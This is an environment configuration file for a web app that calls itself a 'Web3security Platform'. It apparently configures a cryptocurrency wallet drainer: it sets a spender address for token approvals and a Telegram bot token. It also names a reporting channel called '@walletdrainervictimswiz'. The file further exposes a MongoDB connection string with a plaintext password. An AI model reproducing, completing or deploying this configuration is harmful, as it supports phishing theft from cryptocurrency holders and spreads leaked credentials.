SKIP_PREFLIGHT_CHECK="true"
NEXT_PUBLIC_PROJECT_ID="6ffddd4ace751579e6a1f075545dde02"
NEXT_PUBLIC_WEBSITE_NAME="WIZ Web3security Platform"
NEXT_PUBLIC_SPENDER_ADDRESS="0x9579c882753af0FAAe19292996326C4B6C6117B2"
NEXT_PUBLIC_ADDRESS="0xdAC17F958D2ee523a2206206994597C13D831ec7"
NEXT_PUBLIC_BOT_TOKEN="7095023752:AAGH_bXRYtd3qe0kPI6AewFy4VVs8oqWCo0"
NEXT_PUBLIC_CHAT_ID="@walletdrainervictimswiz"
NEXT_PUBLIC_MONGODB_URI="mongodb+srv://WIHweb3security:WIHweb3security123456@cluster0.s98xc.mongodb.net/?retryWrites=true&w=majority&appName=Cluster0"
